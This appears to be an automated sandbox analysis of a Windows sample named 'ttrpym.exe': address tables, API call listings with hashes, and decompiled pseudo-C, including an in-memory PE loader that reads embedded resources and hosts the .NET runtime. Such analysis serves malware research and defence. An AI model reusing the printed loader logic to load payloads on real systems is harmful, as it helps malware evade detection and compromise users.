                                                                                                                        0x004019a2
                                                                                                                        0x004019ae
                                                                                                                        0x004019b0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004019b2
                                                                                                                        0x004019b9
                                                                                                                        0x004019ec
                                                                                                                        0x004019ec
                                                                                                                        0x00401a03
                                                                                                                        0x00401a09
                                                                                                                        0x00401a0f
                                                                                                                        0x00401a16
                                                                                                                        0x00000000
                                                                                                                        0x00401a2c
                                                                                                                        0x00401a1f
                                                                                                                        0x00000000
                                                                                                                        0x00401a25
                                                                                                                        0x004019bb
                                                                                                                        0x004019c1
                                                                                                                        0x004019c4
                                                                                                                        0x004019ca
                                                                                                                        0x004019d0
                                                                                                                        0x004019d3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004019d5
                                                                                                                        0x004019dc
                                                                                                                        0x004019e3
                                                                                                                        0x004019ea
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004019ea
                                                                                                                        0x004019f8
                                                                                                                        0x004019fa
                                                                                                                        0x004019fd
                                                                                                                        0x00000000
                                                                                                                        0x004019fd
                                                                                                                        0x00401968
                                                                                                                        0x00000000
                                                                                                                        0x0040196e
                                                                                                                        0x00401904
                                                                                                                        0x0040190a
                                                                                                                        0x0040190d
                                                                                                                        0x00401913
                                                                                                                        0x00401919
                                                                                                                        0x0040191c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040191e
                                                                                                                        0x00401925
                                                                                                                        0x0040192c
                                                                                                                        0x00401933
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401933
                                                                                                                        0x00401941
                                                                                                                        0x00401943
                                                                                                                        0x00401946
                                                                                                                        0x00000000
                                                                                                                        0x00401946
                                                                                                                        0x00000000
                                                                                                                        0x004018a0
                                                                                                                        0x00401893
                                                                                                                        0x00000000
                                                                                                                        0x00401899
                                                                                                                        0x0040182f
                                                                                                                        0x00401835
                                                                                                                        0x00401838
                                                                                                                        0x0040183e
                                                                                                                        0x00401844
                                                                                                                        0x00401847
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401849
                                                                                                                        0x00401850
                                                                                                                        0x00401857
                                                                                                                        0x0040185e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040185e
                                                                                                                        0x0040186c
                                                                                                                        0x0040186e
                                                                                                                        0x00401871
                                                                                                                        0x00000000
                                                                                                                        0x00401871
                                                                                                                        0x004017dc
                                                                                                                        0x00000000
                                                                                                                        0x004017e2
                                                                                                                        0x00401778
                                                                                                                        0x0040177e
                                                                                                                        0x00401781
                                                                                                                        0x00401790
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401792
                                                                                                                        0x00401799
                                                                                                                        0x004017a7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004017a7
                                                                                                                        0x004017b5
                                                                                                                        0x004017b7
                                                                                                                        0x004017ba
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • _getenv.LIBCMT ref: 00401510
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401528
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401531
                                                                                                                        • Module32First.KERNEL32 ref: 00401722
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000224), ref: 004017DC
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000224), ref: 00401893
                                                                                                                        • Module32Next.KERNEL32 ref: 004018AE
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000224,?,?,?,00000224,?,?,?,00000224), ref: 00401968
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000224,?,?,?,00000224), ref: 00401A1F
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,?,00000224), ref: 00401A38
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401A40
                                                                                                                        • FindResourceA.KERNEL32(?,00000000), ref: 00401B44
                                                                                                                        • LoadResource.KERNEL32(?,?,?,0000000A), ref: 00401B58
                                                                                                                        • LockResource.KERNEL32(?,?,0000000A), ref: 00401B6B
                                                                                                                        • SizeofResource.KERNEL32(?,?,?,0000000A), ref: 00401B89
                                                                                                                        • _malloc.LIBCMT ref: 00401B90
                                                                                                                        • _memset.LIBCMT ref: 00401BD6
                                                                                                                        • SizeofResource.KERNEL32(?,?,?,?,?,0000000A), ref: 00401C18
                                                                                                                        • _memset.LIBCMT ref: 00401CFD
                                                                                                                        • FreeResource.KERNEL32(?,?,?,?,?,?,?,0000000A), ref: 00401D0C
                                                                                                                        • _malloc.LIBCMT ref: 00401D3A
                                                                                                                        • SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,0000000A), ref: 00401D50
                                                                                                                        • _memset.LIBCMT ref: 00401D90
                                                                                                                        • _memset.LIBCMT ref: 00401DC7
                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 00401F5A
                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0040206B
                                                                                                                        • CLRCreateInstance.MSCOREE(0041B220,0041B210,00000000), ref: 004020C6
                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00402308
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ttrpym.exe,00000105,00F3F310), ref: 004023C2
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ttrpym.exe,00000105), ref: 004023D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CloseHandle$_memset$ModuleSizeof$AddressCreateFileFindLoadModule32NameProc_malloc$ChangeCurrentFirstFreeInstanceLibraryLockNextNotificationProcessSnapshotToolhelp32_getenv
                                                                                                                        • String ID: $!$!$!$"$"$#$%$'$'$)$)$)$*$*$*$*$.$.$0$0x1$1$1$4$4$4$4$4$4$4$5$6$6$8$:$;$;$;$;$=$A$C:\Users\user\Desktop\ttrpym.exe$C:\Users\user\Desktop\ttrpym.exe$CreateFileA$CreateFileW$D$E$G$GetModuleFileNameA$GetModuleFileNameW$GetModuleHandleA$GetModuleHandleW$K$U$V$V$V$W$W$W$W$Z$[$[$[$[$^$d$e$h$kernel32.dll$mscorlib.dll$o$o$o$o$o$o$o$u$v$v$v$v$v$v$v$x$x$x$x$x$x$x${${${${${$}
                                                                                                                        • API String ID: 2763807530-3225119994
                                                                                                                        • Opcode ID: a8f5b03e2d61490cadb47c56cafddab60a2bcf30eb458a7b2d2c2c11d65f2d90
                                                                                                                        • Instruction ID: 4dc773f5e7fee98e6a1e02012dd27a22f7e849ff88423fd6f728a9c658178ef0
                                                                                                                        • Opcode Fuzzy Hash: a8f5b03e2d61490cadb47c56cafddab60a2bcf30eb458a7b2d2c2c11d65f2d90
                                                                                                                        • Instruction Fuzzy Hash: 4EA25B609083E98EDB32CB688C48BDDBBB56B56314F0443D9E098762D2C7791BC5CF66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 83%
                                                                                                                        			E00405550() {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t22;
                                                                                                                        				void* _t27;
                                                                                                                        				intOrPtr _t30;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t43;
                                                                                                                        				void* _t47;
                                                                                                                        				intOrPtr* _t60;
                                                                                                                        				intOrPtr* _t66;
                                                                                                                        				intOrPtr* _t69;
                                                                                                                        				void* _t70;
                                                                                                                        				void* _t71;
                                                                                                                        
                                                                                                                        				_t69 =  *((intOrPtr*)(_t70 + 8));
                                                                                                                        				if( *_t69 == 0x5a4d) {
                                                                                                                        					_t2 = _t69 + 0x3c; // 0x89ffffff
                                                                                                                        					_t60 =  *_t2 + _t69;
                                                                                                                        					if( *_t60 == 0x4550) {
                                                                                                                        						_t22 = VirtualAlloc( *(_t60 + 0x34),  *(_t60 + 0x50), 0x2000, 4); // executed
                                                                                                                        						_t47 = _t22;
                                                                                                                        						if(_t47 != 0) {
                                                                                                                        							L6:
                                                                                                                        							_t66 = HeapAlloc(GetProcessHeap(), 0, 0x14);
                                                                                                                        							 *(_t66 + 4) = _t47;
                                                                                                                        							 *((intOrPtr*)(_t66 + 0xc)) = 0;
                                                                                                                        							 *((intOrPtr*)(_t66 + 8)) = 0;
                                                                                                                        							 *((intOrPtr*)(_t66 + 0x10)) = 0;
                                                                                                                        							VirtualAlloc(_t47,  *(_t60 + 0x50), 0x1000, 4); // executed
                                                                                                                        							_t27 = VirtualAlloc(_t47,  *(_t60 + 0x54), 0x1000, 4);
                                                                                                                        							_t12 = _t69 + 0x3c; // 0x89ffffff
                                                                                                                        							 *(_t70 + 0x14) = _t27;
                                                                                                                        							E0040E0C0(_t47, _t60, _t66, _t27, _t69,  *_t12 +  *(_t60 + 0x54));
                                                                                                                        							_t15 = _t69 + 0x3c; // 0x89ffffff
                                                                                                                        							_push(_t66);
                                                                                                                        							_t30 =  *((intOrPtr*)(_t70 + 0x20)) +  *_t15;
                                                                                                                        							_push(_t60);
                                                                                                                        							 *_t66 = _t30;
                                                                                                                        							_push(_t69);
                                                                                                                        							 *(_t30 + 0x34) = _t47;
                                                                                                                        							E004051E0();
                                                                                                                        							_t71 = _t70 + 0x18;
                                                                                                                        							_t33 = _t47 !=  *(_t60 + 0x34);
                                                                                                                        							if(_t47 !=  *(_t60 + 0x34)) {
                                                                                                                        								E00405340(_t66, _t33);
                                                                                                                        								_t71 = _t71 + 4;
                                                                                                                        							}
                                                                                                                        							_push(_t66);
                                                                                                                        							_t34 = E004053C0();
                                                                                                                        							_push(_t66);
                                                                                                                        							if(_t34 != 0) {
                                                                                                                        								E00405270();
                                                                                                                        								if( *((intOrPtr*)( *_t66 + 0x28)) != 0) {
                                                                                                                        									 *((intOrPtr*)(_t66 + 0x10)) = 1;
                                                                                                                        								}
                                                                                                                        								return _t47;
                                                                                                                        							} else {
                                                                                                                        								E004054E0();
                                                                                                                        								E0040ED5F();
                                                                                                                        								goto L10;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t43 = VirtualAlloc(_t47,  *(_t60 + 0x50), 0x2000, 4); // executed
                                                                                                                        							_t47 = _t43;
                                                                                                                        							if(_t47 == 0) {
                                                                                                                        								L10:
                                                                                                                        								return 0;
                                                                                                                        							} else {
                                                                                                                        								goto L6;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        			}

















                                                                                                                        0x00405551
                                                                                                                        0x0040555e
                                                                                                                        0x00405565
                                                                                                                        0x00405568
                                                                                                                        0x00405570
                                                                                                                        0x0040558e
                                                                                                                        0x00405590
                                                                                                                        0x00405594
                                                                                                                        0x004055ae
                                                                                                                        0x004055bf
                                                                                                                        0x004055c5
                                                                                                                        0x004055c8
                                                                                                                        0x004055cb
                                                                                                                        0x004055ce
                                                                                                                        0x004055db
                                                                                                                        0x004055ed
                                                                                                                        0x004055f3
                                                                                                                        0x004055f9
                                                                                                                        0x00405600
                                                                                                                        0x00405605
                                                                                                                        0x0040560c
                                                                                                                        0x0040560d
                                                                                                                        0x0040560f
                                                                                                                        0x00405610
                                                                                                                        0x00405612
                                                                                                                        0x00405613
                                                                                                                        0x00405616
                                                                                                                        0x0040561d
                                                                                                                        0x00405620
                                                                                                                        0x00405623
                                                                                                                        0x00405628
                                                                                                                        0x0040562d
                                                                                                                        0x0040562d
                                                                                                                        0x00405630
                                                                                                                        0x00405631
                                                                                                                        0x00405639
                                                                                                                        0x0040563c
                                                                                                                        0x00405652
                                                                                                                        0x00405660
                                                                                                                        0x00405662
                                                                                                                        0x00405662
                                                                                                                        0x0040566f
                                                                                                                        0x0040563e
                                                                                                                        0x0040563e
                                                                                                                        0x00405646
                                                                                                                        0x00000000
                                                                                                                        0x00405646
                                                                                                                        0x00405596
                                                                                                                        0x004055a2
                                                                                                                        0x004055a4
                                                                                                                        0x004055a8
                                                                                                                        0x0040564b
                                                                                                                        0x00405651
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004055a8
                                                                                                                        0x00405572
                                                                                                                        0x00405576
                                                                                                                        0x00405576
                                                                                                                        0x00405560
                                                                                                                        0x00405563
                                                                                                                        0x00405563

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ed38872e0c83db5bfeb2f107bba3bc63feea66a5ce3c092865b56f89bd48357d
                                                                                                                        • Instruction ID: 43a54962534115526fd1075b69c186f34754c5d537961be6f8ace8771f72133d
                                                                                                                        • Opcode Fuzzy Hash: ed38872e0c83db5bfeb2f107bba3bc63feea66a5ce3c092865b56f89bd48357d
                                                                                                                        • Instruction Fuzzy Hash: 983190B1600701AFE7109FA9DC85B6777A8EB48718F04453AFA09A7291D7B8F814CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 012BA5FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2874748243-0
                                                                                                                        • Opcode ID: b11408a2e7234e5ee383cd55e673a6e0add407bda3eff2db50e93d4f8c1a23e8
                                                                                                                        • Instruction ID: e85ca55f20ffe456c91e873175b1ff7e0666af1d6f93dac58a6597d829223f2b
                                                                                                                        • Opcode Fuzzy Hash: b11408a2e7234e5ee383cd55e673a6e0add407bda3eff2db50e93d4f8c1a23e8
                                                                                                                        • Instruction Fuzzy Hash: 0721D1755097809FDB138F25DC84B92BFB4EF06310F0884DAE9858F163D375A908DB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 012BA5FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2874748243-0
                                                                                                                        • Opcode ID: b909f772c689dfa4b7cf2ec0bc00ec03339003e6fc174e5b0c03606b2413e583
                                                                                                                        • Instruction ID: 134d4ecb018386baa391e1a757fa2053695a77995ba8168cd26af71275da97da
                                                                                                                        • Opcode Fuzzy Hash: b909f772c689dfa4b7cf2ec0bc00ec03339003e6fc174e5b0c03606b2413e583
                                                                                                                        • Instruction Fuzzy Hash: B111A0719107009FDB21CF59E885BA6FBE4EF44320F08C46AEE458B652D375E458DB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 012BAD7D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3562636166-0
                                                                                                                        • Opcode ID: b15c3f6b5d789da310e8805b852269cd61724a2f74685fcc3f59eede68b03370
                                                                                                                        • Instruction ID: 513e046d2a3d59f17bd8069a46c5e2392bfd7a9a3a65402a0a852e5947e59283
                                                                                                                        • Opcode Fuzzy Hash: b15c3f6b5d789da310e8805b852269cd61724a2f74685fcc3f59eede68b03370
                                                                                                                        • Instruction Fuzzy Hash: 161186754097809FD7228F15DC44B62FFB4EF46310F08C49EEE854B563D275A918DB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,00000E30,?,?), ref: 012BAC2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2645101109-0
                                                                                                                        • Opcode ID: 30f58f85a371e2476c766e6d3680994be4427b8acd5c00b7476a941e2b8a7f3d
                                                                                                                        • Instruction ID: d19a44d77fb3bb4ec8c171b37e9bc30e9c04aaeed62e0b882ae3fbacff5ba8bd
                                                                                                                        • Opcode Fuzzy Hash: 30f58f85a371e2476c766e6d3680994be4427b8acd5c00b7476a941e2b8a7f3d
                                                                                                                        • Instruction Fuzzy Hash: 6301AD71500600ABD320DF1ADC86B32FBA8FBC9B20F14815AED084B741E635F915CAE6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: recv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1507349165-0
                                                                                                                        • Opcode ID: 4a6e820a047d5724bc884c188e424f3acfe778740ce27028fe7a2320504ba38f
                                                                                                                        • Instruction ID: 42cf2b009d6b4c17ad3387cd8392b3e0cc857f0816002e57a2c7d806664fb0df
                                                                                                                        • Opcode Fuzzy Hash: 4a6e820a047d5724bc884c188e424f3acfe778740ce27028fe7a2320504ba38f
                                                                                                                        • Instruction Fuzzy Hash: FD01B1314107409FDB21CF59E885BA1FFA0EF44320F08C4AADE898B212D275A408CB72
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 012BAD7D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3562636166-0
                                                                                                                        • Opcode ID: cea97357ab6235ec5ba82b4a0a5d01a336a990f8dc5aac4b72d0a34f1042f232
                                                                                                                        • Instruction ID: 290036f40aa354e898c99eed9245cf1be2aa54163fc70d02e4ae0f29c967bdee
                                                                                                                        • Opcode Fuzzy Hash: cea97357ab6235ec5ba82b4a0a5d01a336a990f8dc5aac4b72d0a34f1042f232
                                                                                                                        • Instruction Fuzzy Hash: C3018F35410740DFDB218F19E885BA1FFA0EF44721F08C49ADE854B252D275A418CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00418F50(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                        				signed int _v8;
                                                                                                                        				int _v12;
                                                                                                                        				int _v16;
                                                                                                                        				int _v20;
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				void* _v36;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t110;
                                                                                                                        				intOrPtr _t112;
                                                                                                                        				intOrPtr _t113;
                                                                                                                        				short* _t115;
                                                                                                                        				short* _t116;
                                                                                                                        				char* _t120;
                                                                                                                        				short* _t121;
                                                                                                                        				short* _t123;
                                                                                                                        				short* _t127;
                                                                                                                        				int _t128;
                                                                                                                        				short* _t141;
                                                                                                                        				signed int _t144;
                                                                                                                        				void* _t146;
                                                                                                                        				short* _t147;
                                                                                                                        				signed int _t150;
                                                                                                                        				short* _t153;
                                                                                                                        				char* _t157;
                                                                                                                        				int _t160;
                                                                                                                        				int _t161;
                                                                                                                        				long _t162;
                                                                                                                        				signed int _t174;
                                                                                                                        				signed int _t178;
                                                                                                                        				signed int _t179;
                                                                                                                        				int _t182;
                                                                                                                        				short* _t184;
                                                                                                                        				signed int _t186;
                                                                                                                        				signed int _t188;
                                                                                                                        				short* _t189;
                                                                                                                        				int _t191;
                                                                                                                        				int _t207;
                                                                                                                        
                                                                                                                        				_t110 =  *0x4228b4; // 0xb87af74f
                                                                                                                        				_v8 = _t110 ^ _t188;
                                                                                                                        				_t184 = __ecx;
                                                                                                                        				if( *0x4241bc == 0) {
                                                                                                                        					_t182 = 1;
                                                                                                                        					_t161 = LCMapStringW(0, 0x100, 0x420398, 1, 0, 0); // executed
                                                                                                                        					if(_t161 == 0) {
                                                                                                                        						_t162 = GetLastError();
                                                                                                                        						__eflags = _t162 - 0x78;
                                                                                                                        						if(_t162 == 0x78) {
                                                                                                                        							 *0x4241bc = 2;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						 *0x4241bc = 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				if(_a16 <= 0) {
                                                                                                                        					L13:
                                                                                                                        					_t112 =  *0x4241bc;
                                                                                                                        					if(_t112 == 2 || _t112 == 0) {
                                                                                                                        						_v16 = 0;
                                                                                                                        						_v20 = 0;
                                                                                                                        						__eflags = _a4;
                                                                                                                        						if(_a4 == 0) {
                                                                                                                        							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                        						}
                                                                                                                        						__eflags = _a28;
                                                                                                                        						if(_a28 == 0) {
                                                                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                        						}
                                                                                                                        						_t113 = E004198F0(0, _t179, _t182, _t184, _a4);
                                                                                                                        						_v24 = _t113;
                                                                                                                        						__eflags = _t113 - 0xffffffff;
                                                                                                                        						if(_t113 != 0xffffffff) {
                                                                                                                        							__eflags = _t113 - _a28;
                                                                                                                        							if(_t113 == _a28) {
                                                                                                                        								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                        								L78:
                                                                                                                        								__eflags = _v16;
                                                                                                                        								if(__eflags != 0) {
                                                                                                                        									_push(_v16);
                                                                                                                        									E0040E815(0, _t182, _t184, __eflags);
                                                                                                                        								}
                                                                                                                        								_t115 = _v20;
                                                                                                                        								__eflags = _t115;
                                                                                                                        								if(_t115 != 0) {
                                                                                                                        									__eflags = _a20 - _t115;
                                                                                                                        									if(__eflags != 0) {
                                                                                                                        										_push(_t115);
                                                                                                                        										E0040E815(0, _t182, _t184, __eflags);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t116 = _t184;
                                                                                                                        								goto L84;
                                                                                                                        							}
                                                                                                                        							_t120 = E00419939(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                        							_t191 =  &(_t189[0xc]);
                                                                                                                        							_v16 = _t120;
                                                                                                                        							__eflags = _t120;
                                                                                                                        							if(_t120 == 0) {
                                                                                                                        								goto L58;
                                                                                                                        							}
                                                                                                                        							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                        							_v12 = _t121;
                                                                                                                        							__eflags = _t121;
                                                                                                                        							if(__eflags != 0) {
                                                                                                                        								if(__eflags <= 0) {
                                                                                                                        									L71:
                                                                                                                        									_t182 = 0;
                                                                                                                        									__eflags = 0;
                                                                                                                        									L72:
                                                                                                                        									__eflags = _t182;
                                                                                                                        									if(_t182 == 0) {
                                                                                                                        										goto L62;
                                                                                                                        									}
                                                                                                                        									E0040E430(_t182, _t182, 0, _v12);
                                                                                                                        									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                        									_v12 = _t123;
                                                                                                                        									__eflags = _t123;
                                                                                                                        									if(_t123 != 0) {
                                                                                                                        										_t186 = E00419939(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                        										_v20 = _t186;
                                                                                                                        										asm("sbb esi, esi");
                                                                                                                        										_t184 =  ~_t186 & _v12;
                                                                                                                        										__eflags = _t184;
                                                                                                                        									} else {
                                                                                                                        										_t184 = 0;
                                                                                                                        									}
                                                                                                                        									E00416C40(_t182);
                                                                                                                        									goto L78;
                                                                                                                        								}
                                                                                                                        								__eflags = _t121 - 0xffffffe0;
                                                                                                                        								if(_t121 > 0xffffffe0) {
                                                                                                                        									goto L71;
                                                                                                                        								}
                                                                                                                        								_t127 =  &(_t121[4]);
                                                                                                                        								__eflags = _t127 - 0x400;
                                                                                                                        								if(_t127 > 0x400) {
                                                                                                                        									_t128 = E0040DFE9(0, _t179, _t182, _t127);
                                                                                                                        									__eflags = _t128;
                                                                                                                        									if(_t128 != 0) {
                                                                                                                        										 *_t128 = 0xdddd;
                                                                                                                        										_t128 = _t128 + 8;
                                                                                                                        										__eflags = _t128;
                                                                                                                        									}
                                                                                                                        									_t182 = _t128;
                                                                                                                        									goto L72;
                                                                                                                        								}
                                                                                                                        								E00419AF0(_t127);
                                                                                                                        								_t182 = _t191;
                                                                                                                        								__eflags = _t182;
                                                                                                                        								if(_t182 == 0) {
                                                                                                                        									goto L62;
                                                                                                                        								}
                                                                                                                        								 *_t182 = 0xcccc;
                                                                                                                        								_t182 = _t182 + 8;
                                                                                                                        								goto L72;
                                                                                                                        							}
                                                                                                                        							L62:
                                                                                                                        							_t184 = 0;
                                                                                                                        							goto L78;
                                                                                                                        						} else {
                                                                                                                        							goto L58;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						if(_t112 != 1) {
                                                                                                                        							L58:
                                                                                                                        							_t116 = 0;
                                                                                                                        							L84:
                                                                                                                        							return E00415C0B(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                        						}
                                                                                                                        						_v12 = 0;
                                                                                                                        						if(_a28 == 0) {
                                                                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                        						}
                                                                                                                        						_t184 = MultiByteToWideChar;
                                                                                                                        						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                        						_t207 = _t182;
                                                                                                                        						if(_t207 == 0) {
                                                                                                                        							goto L58;
                                                                                                                        						} else {
                                                                                                                        							if(_t207 <= 0) {
                                                                                                                        								L28:
                                                                                                                        								_v16 = 0;
                                                                                                                        								L29:
                                                                                                                        								if(_v16 == 0) {
                                                                                                                        									goto L58;
                                                                                                                        								}
                                                                                                                        								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                        									L52:
                                                                                                                        									E00416C40(_v16);
                                                                                                                        									_t116 = _v12;
                                                                                                                        									goto L84;
                                                                                                                        								}
                                                                                                                        								_t184 = LCMapStringW;
                                                                                                                        								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                        								_v12 = _t174;
                                                                                                                        								if(_t174 == 0) {
                                                                                                                        									goto L52;
                                                                                                                        								}
                                                                                                                        								if((_a8 & 0x00000400) == 0) {
                                                                                                                        									__eflags = _t174;
                                                                                                                        									if(_t174 <= 0) {
                                                                                                                        										L44:
                                                                                                                        										_t184 = 0;
                                                                                                                        										__eflags = 0;
                                                                                                                        										L45:
                                                                                                                        										__eflags = _t184;
                                                                                                                        										if(_t184 != 0) {
                                                                                                                        											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                        											__eflags = _t141;
                                                                                                                        											if(_t141 != 0) {
                                                                                                                        												_push(0);
                                                                                                                        												_push(0);
                                                                                                                        												__eflags = _a24;
                                                                                                                        												if(_a24 != 0) {
                                                                                                                        													_push(_a24);
                                                                                                                        													_push(_a20);
                                                                                                                        												} else {
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        												}
                                                                                                                        												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                        											}
                                                                                                                        											E00416C40(_t184);
                                                                                                                        										}
                                                                                                                        										goto L52;
                                                                                                                        									}
                                                                                                                        									_t144 = 0xffffffe0;
                                                                                                                        									_t179 = _t144 % _t174;
                                                                                                                        									__eflags = _t144 / _t174 - 2;
                                                                                                                        									if(_t144 / _t174 < 2) {
                                                                                                                        										goto L44;
                                                                                                                        									}
                                                                                                                        									_t52 = _t174 + 8; // 0x8
                                                                                                                        									_t146 = _t174 + _t52;
                                                                                                                        									__eflags = _t146 - 0x400;
                                                                                                                        									if(_t146 > 0x400) {
                                                                                                                        										_t147 = E0040DFE9(0, _t179, _t182, _t146);
                                                                                                                        										__eflags = _t147;
                                                                                                                        										if(_t147 != 0) {
                                                                                                                        											 *_t147 = 0xdddd;
                                                                                                                        											_t147 =  &(_t147[4]);
                                                                                                                        											__eflags = _t147;
                                                                                                                        										}
                                                                                                                        										_t184 = _t147;
                                                                                                                        										goto L45;
                                                                                                                        									}
                                                                                                                        									E00419AF0(_t146);
